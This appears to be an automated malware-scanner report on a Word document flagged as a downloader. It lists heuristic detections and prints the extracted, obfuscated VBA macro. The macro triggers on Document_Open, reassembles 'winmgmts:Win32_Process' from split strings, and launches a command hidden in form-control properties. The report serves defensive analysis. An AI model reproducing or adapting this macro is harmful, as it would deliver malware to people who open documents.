MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-7448061-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7448061-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set Xorfiqlkxxed = CreateObject(Tcoqcohzvycm) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Xorfiqlkxxed = CreateObject(Tcoqcohzvycm) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8787 bytes |
SHA-256: 6224f6e44f0607c29f92e3ded3a45283c036abce0ae8176dd31fc8c9989fb4ec |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
147 of 220 identifiers look randomly generated (e.g. 'Mbrphbftghjdj') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Jmijjjwz"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cmsodkagln, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Psnacbyoo = Rgvuodzcz To 0
For Mvjndaabwfub = Zholwhlfadbih To 0
Xisxvfsroxx = (23 + Round(WOJOkxR3))
Next
Mcxeovowkr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Jgufmvtdkzwbe = uzH To MZDUoaj1
Hqanytysxgwt = ChrB(dANsZ68a4)
Next
For Umqpymzxl = 0 To 0
Ekbnfvad = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
For Kxulerbclz = Puctncuztox To 0
For Qgkfgaojbi = Cenmqazu To 0
Zxvkgosrvadc = (23 + Round(WOJOkxR3))
Next
Qxfznenlqq = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Gndoxwtugnkwt = uzH To MZDUoaj1
Kmkzapcvtva = ChrB(dANsZ68a4)
Next
For Ingeziieoh = 0 To 0
Itedmigon = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
For Mvaayvvxtcp = Wmagdsmafqo To 0
For Jbpcxwaxve = Ecrjmdckv To 0
Qkwjfogflvm = (23 + Round(WOJOkxR3))
Next
Hqetxqaixazq = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Tnluqroysam = uzH To MZDUoaj1
Oyrlrpxbvy = ChrB(dANsZ68a4)
Next
For Eqetkxskxn = 0 To 0
Awufjyeg = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Swumbowaigdjf
End Sub
Attribute VB_Name = "Sfonhqibzw"
Attribute VB_Base = "0{9B2A4338-B897-444A-A779-B143BA992B4A}{0B3CF45D-5FD6-4949-84A1-381C66AD4230}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Tebeqsmzwihuh"
Function Trtzyboghqnv()
For Bxogtrqcts = Alimqjauxwg To 0
For Liyszzwmf = Htagilcws To 0
Rnputrxleqb = (23 + Round(WOJOkxR3))
Next
Jrkuscfvh = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Witmlukuk = uzH To MZDUoaj1
Kcffeotyqgs = ChrB(dANsZ68a4)
Next
For Qbidqptkmkxlx = 0 To 0
Kghqltghomxqb = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Tmtfgqwh = Jmijjjwz.Cmsodkagln
For Wgzpadmybl = Cnrnhbzgi To 0
For Wjllttkzdeodw = Mmfsjkax To 0
Wlylejcegcgp = (23 + Round(WOJOkxR3))
Next
Eqlgcojvfdpm = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Hpwmrsxhlny = uzH To MZDUoaj1
Ypfxxunnsy = ChrB(dANsZ68a4)
Next
For Fiafvwsimwqg = 0 To 0
Zuwfxhhdkfags = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Knkdvjkxc = Tmtfgqwh + Sfonhqibzw.Ugpgpbkc + Sfonhqibzw.Xhxonjbodqlbv + Sfonhqibzw.Ryxzseahphsba
For Ultxoocklbbyg = Ybbvwntudqn To 0
For Eesypcuel = Nvqbeppomfbnd To 0
Mbrphbftghjdj = (23 + Round(WOJOkxR3))
Next
Knodibwrpnb = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Dcqoypqsmvfw = uzH To MZDUoaj1
Jtvmfkvu = ChrB(dANsZ68a4)
Next
For Arypjcbfckqdq = 0 To 0
Uoyxrjgaz = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Nceizhcj = Knkdvjkxc + Sfonhqibzw.Gwfpippqq + Sfonhqibzw.Hwekonmzcqemd.ControlTipText
For Jijyehojw = Fyxhvxunhkq To 0
For Ethplpqakc = Ctymaibhnorh To 0
Tjfcysryu = (23 + Round(WOJOkxR3))
Next
Zygzovvp = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Ewagbpjypbzj = uzH To MZDUoaj1
Hvhepceynmbku = ChrB(dANsZ68a4)
Next
For Svrrppnevwdia = 0 To 0
Apvkrsoral = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Trtzyboghqnv = Oghweyfyl + Nceizhcj + Oghweyfyl
For Uohhudctbpsxz = Dzyiocbkvfgdg To 0
For Dgafhfvcppq = Xtzqkzycovw To 0
Dlbnavkolmxu = (23 + Round(WOJOkxR3))
Next
Hwjsyumncgq = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Kkokdhocj = uzH To MZDUoaj1
Ovxalhcw = ChrB(dANsZ68a4)
Next
For Qgfcydgqjv = 0 To 0
Nzexbumuo = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
End Function
Function Swumbowaigdjf()
For Bqsuuznsbus = Waajezzwshldj To 0
For Fkadlbagc = Obciokfvokioi To 0
Rjjgqlvfnq = (23 + Round(WOJOkxR3))
Next
Kuvtyfilytk = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Xnpxxwre = uzH To MZDUoaj1
Rxvmksvpru = ChrB(dANsZ68a4)
Next
For Asqkiannxyrf = 0 To 0
Gipucklkewctx = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Tcoqcohzvycm = "wi" + "nmgmt" + "s:" + "Win3" + "2_" + Jmijjjwz.Cmsodkagln + "r" + "oc" + "ess" + I
For Jscdworowpl = Znaoziwy To 0
For Zdtzidcie = Ifgjhjxge To 0
Zpbpcywh = (23 + Round(WOJOkxR3))
Next
Jmcacpikthgo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Iufsyyrvczde = uzH To MZDUoaj1
Bemwnnysdieu = ChrB(dANsZ68a4)
Next
For Kvtlsjhitdjma = 0 To 0
Cwyrpiovja = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Set Xorfiqlkxxed = CreateObject(Tcoqcohzvycm)
For Onmmjjcnfdqx = Zxlehnpsmypzd To 0
For Qaokwrju = Lzbofjjugek To 0
Okdvanxkfrlpd = (23 + Round(WOJOkxR3))
Next
Rfqcwrvnoeh = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Fwgrjeazt = uzH To MZDUoaj1
Hrdghpych = ChrB(dANsZ68a4)
Next
For Anikeswo = 0 To 0
Yqeilufzbnxj = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Jphbvyvkrq = Tcoqcohzvycm + Sfonhqibzw.Jacvjxbrbumto.ControlTipText + Sfonhqibzw.Tkwjxcncrrwa.ControlTipText
For Clxnmlbdcl = Ymodgheqprq To 0
For Kuuitift = Rfisctofsfbum To 0
Pczsvkuyjcq = (23 + Round(WOJOkxR3))
Next
Jdbtxnwyxpbx = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Yscpiqrdff = uzH To MZDUoaj1
Oxgypmmuw = ChrB(dANsZ68a4)
Next
For Hxzgrrmx = 0 To 0
Ywghmircfxws = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Luwrpdeedtxj = Jphbvyvkrq + Jmijjjwz.Cmsodkagln
For Hnhfjfmoxntcy = Glpxtyixl To 0
For Qgcyxprjb = Cngdbbcmdp To 0
Uirbczypvyco = (23 + Round(WOJOkxR3))
Next
Yqekopwujb = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Whvzdsymhqg = uzH To MZDUoaj1
Kdvpdlrwpdm = ChrB(dANsZ68a4)
Next
For Acxazpllcruw = 0 To 0
Queijqvdla = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Set Swumbowaigdjf = CreateObject(Luwrpdeedtxj)
For Ifwpdkeecqwix = Aaefgxzqmj To 0
For Whiblyygtvgfv = Qnweyjeklt To 0
Aipjfhlhw = (23 + Round(WOJOkxR3))
Next
Lkzcteuzkmo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Pfxpsxxi = uzH To MZDUoaj1
Yxdmbxjmnxzl = ChrB(dANsZ68a4)
Next
For Gkgrtyulamtzk = 0 To 0
Zwfirafprtb = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Swumbowaigdjf.XSize = False
For Nazpejcx = Uwpgdhswdy To 0
For Mfuhjtxq = Pvdopmibidbqn To 0
Atalffkpjo = (23 + Round(WOJOkxR3))
Next
Xziarxwgucpr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Cpkbvrevjax = uzH To MZDUoaj1
Sfguavrlb = ChrB(dANsZ68a4)
Next
For Ksrjrxei = 0 To 0
Duehscqbqidm = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Swumbowaigdjf.YSize = False
For Sqelhflkxztt = Idungqxnp To 0
For Hhmgdbhgbomji = Vienrgextdez To 0
Xfbtmayzetx = (23 + Round(WOJOkxR3))
Next
Qtwumgnvpic = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Cjsczcfrdjlq = uzH To MZDUoaj1
Uvdlpftnd = ChrB(dANsZ68a4)
Next
For Ssntixyaux = 0 To 0
Buugvnkkd = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Do While Xorfiqlkxxed.Create(Null & Trtzyboghqnv, Xihomhlcufq, Swumbowaigdjf)
Loop
For Tekkbgto = Fhgnuvxvttd To 0
For Vqrwnxkkm = Qbgezhutvr To 0
Yjrffjieyyw = (23 + Round(WOJOkxR3))
Next
Kkgrhdstxxso = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Lzjyqlbsmvrfb = uzH To MZDUoaj1
Lrfqlpxncn = ChrB(dANsZ68a4)
Next
For Wblyqmmwfoz = 0 To 0
Srxlzccok = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.